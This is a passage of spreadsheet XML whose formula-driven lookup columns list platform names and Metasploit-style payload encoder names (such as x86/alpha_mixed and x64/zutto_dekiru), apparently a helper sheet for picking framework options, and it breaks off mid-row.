      <c r="I73" s="130" t="s">
        <v>21999</v>
      </c>
      <c r="J73" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K73" s="131">
        <f>IF(J73=1,COUNTIF($J$53:J73,1),"")</f>
        <v>21</v>
      </c>
      <c r="L73" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K73),$K$53:$K$97,0)),"")</f>
        <v>x64/xor_dynamic</v>
      </c>
      <c r="M73" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q73" s="130" t="s">
        <v>22000</v>
      </c>
      <c r="R73" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S73" s="131" t="str">
        <f>IF(R73=1,COUNTIF($R$53:R73,1),"")</f>
        <v/>
      </c>
      <c r="T73" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S73),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U73" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="74" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A74" s="130" t="s">
        <v>22001</v>
      </c>
      <c r="B74" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C74" s="131" t="str">
        <f>IF(B74=1,COUNTIF($B$53:B74,1),"")</f>
        <v/>
      </c>
      <c r="D74" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C74),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E74" s="130" t="s">
        <v>22002</v>
      </c>
      <c r="F74" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G74" s="131">
        <f>IF(F74=1,COUNTIF($F$53:F74,1),"")</f>
        <v>22</v>
      </c>
      <c r="H74" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G74),$G$53:$G$84,0)),"")</f>
        <v>openbsd</v>
      </c>
      <c r="I74" s="130" t="s">
        <v>22003</v>
      </c>
      <c r="J74" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K74" s="131">
        <f>IF(J74=1,COUNTIF($J$53:J74,1),"")</f>
        <v>22</v>
      </c>
      <c r="L74" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K74),$K$53:$K$97,0)),"")</f>
        <v>x64/zutto_dekiru</v>
      </c>
      <c r="M74" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q74" s="130" t="s">
        <v>21967</v>
      </c>
      <c r="R74" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S74" s="131" t="str">
        <f>IF(R74=1,COUNTIF($R$53:R74,1),"")</f>
        <v/>
      </c>
      <c r="T74" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S74),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U74" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="75" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A75" s="130" t="s">
        <v>22004</v>
      </c>
      <c r="B75" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C75" s="131" t="str">
        <f>IF(B75=1,COUNTIF($B$53:B75,1),"")</f>
        <v/>
      </c>
      <c r="D75" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C75),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E75" s="130" t="s">
        <v>22005</v>
      </c>
      <c r="F75" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G75" s="131">
        <f>IF(F75=1,COUNTIF($F$53:F75,1),"")</f>
        <v>23</v>
      </c>
      <c r="H75" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G75),$G$53:$G$84,0)),"")</f>
        <v>osx</v>
      </c>
      <c r="I75" s="130" t="s">
        <v>22006</v>
      </c>
      <c r="J75" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K75" s="131">
        <f>IF(J75=1,COUNTIF($J$53:J75,1),"")</f>
        <v>23</v>
      </c>
      <c r="L75" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K75),$K$53:$K$97,0)),"")</f>
        <v>x86/add_sub</v>
      </c>
      <c r="M75" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q75" s="130" t="s">
        <v>22007</v>
      </c>
      <c r="R75" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S75" s="131" t="str">
        <f>IF(R75=1,COUNTIF($R$53:R75,1),"")</f>
        <v/>
      </c>
      <c r="T75" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S75),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U75" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="76" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A76" s="130" t="s">
        <v>22008</v>
      </c>
      <c r="B76" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C76" s="131" t="str">
        <f>IF(B76=1,COUNTIF($B$53:B76,1),"")</f>
        <v/>
      </c>
      <c r="D76" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C76),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E76" s="130" t="s">
        <v>22009</v>
      </c>
      <c r="F76" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G76" s="131">
        <f>IF(F76=1,COUNTIF($F$53:F76,1),"")</f>
        <v>24</v>
      </c>
      <c r="H76" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G76),$G$53:$G$84,0)),"")</f>
        <v>php</v>
      </c>
      <c r="I76" s="130" t="s">
        <v>22010</v>
      </c>
      <c r="J76" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K76" s="131">
        <f>IF(J76=1,COUNTIF($J$53:J76,1),"")</f>
        <v>24</v>
      </c>
      <c r="L76" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K76),$K$53:$K$97,0)),"")</f>
        <v>x86/alpha_mixed</v>
      </c>
      <c r="M76" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q76" s="130" t="s">
        <v>22011</v>
      </c>
      <c r="R76" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S76" s="131" t="str">
        <f>IF(R76=1,COUNTIF($R$53:R76,1),"")</f>
        <v/>
      </c>
      <c r="T76" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S76),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U76" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="77" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A77" s="130" t="s">
        <v>22012</v>
      </c>
      <c r="B77" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C77" s="131" t="str">
        <f>IF(B77=1,COUNTIF($B$53:B77,1),"")</f>
        <v/>
      </c>
      <c r="D77" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C77),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E77" s="130" t="s">
        <v>22013</v>
      </c>
      <c r="F77" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G77" s="131">
        <f>IF(F77=1,COUNTIF($F$53:F77,1),"")</f>
        <v>25</v>
      </c>
      <c r="H77" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G77),$G$53:$G$84,0)),"")</f>
        <v>python</v>
      </c>
      <c r="I77" s="130" t="s">
        <v>22014</v>
      </c>
      <c r="J77" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K77" s="131">
        <f>IF(J77=1,COUNTIF($J$53:J77,1),"")</f>
        <v>25</v>
      </c>
      <c r="L77" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K77),$K$53:$K$97,0)),"")</f>
        <v>x86/alpha_upper</v>
      </c>
      <c r="M77" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q77" s="130" t="s">
        <v>22015</v>
      </c>
      <c r="R77" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S77" s="131" t="str">
        <f>IF(R77=1,COUNTIF($R$53:R77,1),"")</f>
        <v/>
      </c>
      <c r="T77" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S77),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="78" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A78" s="130" t="s">
        <v>22016</v>
      </c>
      <c r="B78" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C78" s="131" t="str">
        <f>IF(B78=1,COUNTIF($B$53:B78,1),"")</f>
        <v/>
      </c>
      <c r="D78" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C78),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E78" s="130" t="s">
        <v>22017</v>
      </c>
      <c r="F78" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G78" s="131">
        <f>IF(F78=1,COUNTIF($F$53:F78,1),"")</f>
        <v>26</v>
      </c>
      <c r="H78" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G78),$G$53:$G$84,0)),"")</f>
        <v>r</v>
      </c>
      <c r="I78" s="130" t="s">
        <v>22018</v>
      </c>
      <c r="J78" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K78" s="131">
        <f>IF(J78=1,COUNTIF($J$53:J78,1),"")</f>
        <v>26</v>
      </c>
      <c r="L78" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K78),$K$53:$K$97,0)),"")</f>
        <v>x86/avoid_underscore_tolower</v>
      </c>
      <c r="M78" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q78" s="130" t="s">
        <v>22019</v>
      </c>
      <c r="R78" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S78" s="131" t="str">
        <f>IF(R78=1,COUNTIF($R$53:R78,1),"")</f>
        <v/>
      </c>
      <c r="T78" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S78),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="79" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A79" s="130" t="s">
        <v>22020</v>
      </c>
      <c r="B79" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C79" s="131" t="str">
        <f>IF(B79=1,COUNTIF($B$53:B79,1),"")</f>
        <v/>
      </c>
      <c r="D79" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C79),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E79" s="130" t="s">
        <v>22021</v>
      </c>
      <c r="F79" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G79" s="131">
        <f>IF(F79=1,COUNTIF($F$53:F79,1),"")</f>
        <v>27</v>
      </c>
      <c r="H79" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G79),$G$53:$G$84,0)),"")</f>
        <v>ruby</v>
      </c>
      <c r="I79" s="130" t="s">
        <v>22022</v>
      </c>
      <c r="J79" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K79" s="131">
        <f>IF(J79=1,COUNTIF($J$53:J79,1),"")</f>
        <v>27</v>
      </c>
      <c r="L79" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K79),$K$53:$K$97,0)),"")</f>
        <v>x86/avoid_utf8_tolower</v>
      </c>
      <c r="M79" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q79" s="130" t="s">
        <v>22023</v>
      </c>
      <c r="R79" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S79" s="131" t="str">
        <f>IF(R79=1,COUNTIF($R$53:R79,1),"")</f>
        <v/>
      </c>
      <c r="T79" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S79),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="80" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A80" s="130" t="s">
        <v>22024</v>
      </c>
      <c r="B80" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C80" s="131" t="str">
        <f>IF(B80=1,COUNTIF($B$53:B80,1),"")</f>
        <v/>
      </c>
      <c r="D80" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C80),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E80" s="130" t="s">
        <v>22025</v>
      </c>
      <c r="F80" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G80" s="131">
        <f>IF(F80=1,COUNTIF($F$53:F80,1),"")</f>
        <v>28</v>
      </c>
      <c r="H80" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G80),$G$53:$G$84,0)),"")</f>
        <v>solaris</v>
      </c>
      <c r="I80" s="130" t="s">
        <v>22026</v>
      </c>
      <c r="J80" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K80" s="131">
        <f>IF(J80=1,COUNTIF($J$53:J80,1),"")</f>
        <v>28</v>
      </c>
      <c r="L80" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K80),$K$53:$K$97,0)),"")</f>
        <v>x86/bloxor</v>
      </c>
      <c r="M80" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q80" s="130" t="s">
        <v>22027</v>
      </c>
      <c r="R80" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S80" s="131" t="str">
        <f>IF(R80=1,COUNTIF($R$53:R80,1),"")</f>
        <v/>
      </c>
      <c r="T80" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S80),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="81" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A81" s="130" t="s">
        <v>22028</v>
      </c>
      <c r="B81" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C81" s="131" t="str">
        <f>IF(B81=1,COUNTIF($B$53:B81,1),"")</f>
        <v/>
      </c>
      <c r="D81" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C81),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E81" s="130" t="s">
        <v>22029</v>
      </c>
      <c r="F81" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G81" s="131">
        <f>IF(F81=1,COUNTIF($F$53:F81,1),"")</f>
        <v>29</v>
      </c>
      <c r="H81" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G81),$G$53:$G$84,0)),"")</f>
        <v>unifi</v>
      </c>
      <c r="I81" s="130" t="s">
        <v>22030</v>
      </c>
      <c r="J81" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K81" s="131">
        <f>IF(J81=1,COUNTIF($J$53:J81,1),"")</f>
        <v>29</v>
      </c>
      <c r="L81" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K81),$K$53:$K$97,0)),"")</f>
        <v>x86/bmp_polyglot</v>
      </c>
      <c r="M81" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q81" s="130" t="s">
        <v>22031</v>
      </c>
      <c r="R81" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S81" s="131" t="str">
        <f>IF(R81=1,COUNTIF($R$53:R81,1),"")</f>
        <v/>
      </c>
      <c r="T81" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S81),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="82" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A82" s="130" t="s">
        <v>22032</v>
      </c>
      <c r="B82" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C82" s="131" t="str">
        <f>IF(B82=1,COUNTIF($B$53:B82,1),"")</f>
        <v/>
      </c>
      <c r="D82" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C82),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E82" s="130" t="s">
        <v>22033</v>
      </c>
      <c r="F82" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G82" s="131">
        <f>IF(F82=1,COUNTIF($F$53:F82,1),"")</f>
        <v>30</v>
      </c>
      <c r="H82" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G82),$G$53:$G$84,0)),"")</f>
        <v>unix</v>
      </c>
      <c r="I82" s="130" t="s">
        <v>22034</v>
      </c>
      <c r="J82" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K82" s="131">
        <f>IF(J82=1,COUNTIF($J$53:J82,1),"")</f>
        <v>30</v>
      </c>
      <c r="L82" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K82),$K$53:$K$97,0)),"")</f>
        <v>x86/call4_dword_xor</v>
      </c>
      <c r="M82" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q82" s="130" t="s">
        <v>22035</v>
      </c>
      <c r="R82" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S82" s="131" t="str">
        <f>IF(R82=1,COUNTIF($R$53:R82,1),"")</f>
        <v/>
      </c>
      <c r="T82" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S82),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="83" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A83" s="130" t="s">
        <v>22036</v>
      </c>
      <c r="B83" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C83" s="131" t="str">
        <f>IF(B83=1,COUNTIF($B$53:B83,1),"")</f>
        <v/>
      </c>
      <c r="D83" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C83),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E83" s="130" t="s">
        <v>22037</v>
      </c>
      <c r="F83" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G83" s="131">
        <f>IF(F83=1,COUNTIF($F$53:F83,1),"")</f>
        <v>31</v>
      </c>
      <c r="H83" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G83),$G$53:$G$84,0)),"")</f>
        <v>unknown</v>
      </c>
      <c r="I83" s="130" t="s">
        <v>22038</v>
      </c>
      <c r="J83" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K83" s="131">
        <f>IF(J83=1,COUNTIF($J$53:J83,1),"")</f>
        <v>31</v>
      </c>
      <c r="L83" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K83),$K$53:$K$97,0)),"")</f>
        <v>x86/context_cpuid</v>
      </c>
      <c r="M83" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q83" s="130" t="s">
        <v>22039</v>
      </c>
      <c r="R83" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S83" s="131" t="str">
        <f>IF(R83=1,COUNTIF($R$53:R83,1),"")</f>
        <v/>
      </c>
      <c r="T83" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S83),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="84" spans="1:20" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A84" s="130" t="s">
        <v>22040</v>
      </c>
      <c r="B84" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C84" s="131" t="str">
        <f>IF(B84=1,COUNTIF($B$53:B84,1),"")</f>
        <v/>
      </c>
      <c r="D84" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C84),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E84" s="133" t="s">
        <v>22041</v>
      </c>
      <c r="F84" s="134">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G84" s="134">
        <f>IF(F84=1,COUNTIF($F$53:F84,1),"")</f>
        <v>32</v>
      </c>
      <c r="H84" s="134" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G84),$G$53:$G$84,0)),"")</f>
        <v>windows</v>
      </c>
      <c r="I84" s="130" t="s">
        <v>22042</v>
      </c>
      <c r="J84" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K84" s="131">
        <f>IF(J84=1,COUNTIF($J$53:J84,1),"")</f>
        <v>32</v>
      </c>
      <c r="L84" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K84),$K$53:$K$97,0)),"")</f>
        <v>x86/context_stat</v>
      </c>
      <c r="M84" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q84" s="130" t="s">
        <v>22043</v>
      </c>
      <c r="R84" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S84" s="131" t="str">
        <f>IF(R84=1,COUNTIF($R$53:R84,1),"")</f>
        <v/>
      </c>
      <c r="T84" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S84),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="85" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A85" s="130" t="s">
        <v>22044</v>
      </c>
      <c r="B85" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C85" s="131" t="str">
        <f>IF(B85=1,COUNTIF($B$53:B85,1),"")</f>
        <v/>
      </c>
      <c r="D85" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C85),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E85" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I85" s="130" t="s">
        <v>22045</v>
      </c>
      <c r="J85" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K85" s="131">
        <f>IF(J85=1,COUNTIF($J$53:J85,1),"")</f>
        <v>33</v>
      </c>
      <c r="L85" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K85),$K$53:$K$97,0)),"")</f>
        <v>x86/context_time</v>
      </c>
      <c r="M85" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q85" s="130" t="s">
        <v>22046</v>
      </c>
      <c r="R85" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S85" s="131" t="str">
        <f>IF(R85=1,COUNTIF($R$53:R85,1),"")</f>
        <v/>
      </c>
      <c r="T85" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S85),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="86" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A86" s="130" t="s">
        <v>22047</v>
      </c>
      <c r="B86" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C86" s="131" t="str">
        <f>IF(B86=1,COUNTIF($B$53:B86,1),"")</f>
        <v/>
      </c>
      <c r="D86" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C86),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E86" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I86" s="130" t="s">
        <v>22048</v>
      </c>
      <c r="J86" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K86" s="131">
        <f>IF(J86=1,COUNTIF($J$53:J86,1),"")</f>
        <v>34</v>
      </c>
      <c r="L86" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K86),$K$53:$K$97,0)),"")</f>
        <v>x86/countdown</v>
      </c>
      <c r="M86" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q86" s="130" t="s">
        <v>22049</v>
      </c>
      <c r="R86" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S86" s="131" t="str">
        <f>IF(R86=1,COUNTIF($R$53:R86,1),"")</f>
        <v/>
      </c>
      <c r="T86" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S86),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="87" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A87" s="130" t="s">
        <v>22050</v>
      </c>
      <c r="B87" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C87" s="131" t="str">
        <f>IF(B87=1,COUNTIF($B$53:B87,1),"")</f>
        <v/>
      </c>
      <c r="D87" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C87),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E87" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I87" s="130" t="s">
        <v>22051</v>
      </c>
      <c r="J87" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K87" s="131">
        <f>IF(J87=1,COUNTIF($J$53:J87,1),"")</f>
        <v>35</v>
      </c>
      <c r="L87" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K87),$K$53:$K$97,0)),"")</f>
        <v>x86/fnstenv_mov</v>
      </c>
      <c r="M87" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q87" s="130" t="s">
        <v>22052</v>
      </c>
      <c r="R87" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S87" s="131" t="str">
        <f>IF(R87=1,COUNTIF($R$53:R87,1),"")</f>
        <v/>
      </c>
      <c r="T87" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S87),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="88" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A88" s="130" t="s">
        <v>22053</v>
      </c>
      <c r="B88" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C88" s="131" t="str">
        <f>IF(B88=1,COUNTIF($B$53:B88,1),"")</f>
        <v/>
      </c>
      <c r="D88" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C88),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E88" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I88" s="130" t="s">
        <v>22054</v>
      </c>
      <c r="J88" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K88" s="131">
        <f>IF(J88=1,COUNTIF($J$53:J88,1),"")</f>
        <v>36</v>
      </c>
      <c r="L88" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K88),$K$53:$K$97,0)),"")</f>
        <v>x86/jmp_call_additive</v>
      </c>
      <c r="M88" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q88" s="130" t="s">
        <v>22055</v>
      </c>
      <c r="R88" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S88" s="131" t="str">
        <f>IF(R88=1,COUNTIF($R$53:R88,1),"")</f>
        <v/>
      </c>
      <c r="T88" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S88),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
    </row>
    <row r="89" spans="1:20" x14ac:dyDescent="0.25">
      <c r="A89" s="130" t="s">
        <v>22056</v>
      </c>
      <c r="B89" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C89" s="131" t="str">
        <f>IF(B89=1,COUNTIF($B$53:B89,1),"")</f>
        <v/>
      </c>
      <c r="D89" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C89),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E89" s="129" t="s">
        <v>269</v>
      </c>
      <c r="I89" s="130" t="s">
        <v>22057</v>
      </c>
      <c r="J89" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K89" s="131">
        <f>IF(J89=1,COUNTIF($J$53:J89,1),"")</f>
        <v>37</v>
      </c>
      <c r="L89" s="132" t="str">
